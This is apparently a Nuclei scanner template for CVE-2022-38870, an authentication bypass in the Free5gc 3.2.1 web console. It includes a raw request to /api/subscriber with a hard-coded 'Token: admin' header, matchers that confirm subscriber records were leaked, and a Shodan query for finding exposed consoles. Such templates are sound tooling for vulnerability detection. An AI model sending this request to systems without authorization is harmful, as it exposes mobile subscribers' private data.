nuclei-templates/http/cves/2022/CVE-2022-38870.yaml

53 lines
1.5 KiB
YAML

id: CVE-2022-38870
info:
name: Free5gc 3.2.1 - Information Disclosure
author: For3stCo1d
severity: high
description: |
Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: |
Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability.
reference:
- https://github.com/free5gc/free5gc/issues/387
- https://nvd.nist.gov/vuln/detail/CVE-2022-38870
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-38870
cwe-id: CWE-306
epss-score: 0.00607
epss-percentile: 0.76197
cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: free5gc
product: free5gc
shodan-query: http.title:"free5GC Web Console"
tags: cve,cve2022,free5gc,exposure
http:
- raw:
- |
GET /api/subscriber HTTP/1.1
Host: {{Hostname}}
Token: admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"plmnID":'
- '"ueId":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a0046304402205c1fb8bb24a32a3b93d792f4c565c9ef1bd5df742fbd38ee06a89c8f796f1d9402204165c42aecde8cdaace7932b60bb838c30652a5282b0f93dc4f3a0565af1fc27:922c64590222798bb761d5b6d8e72950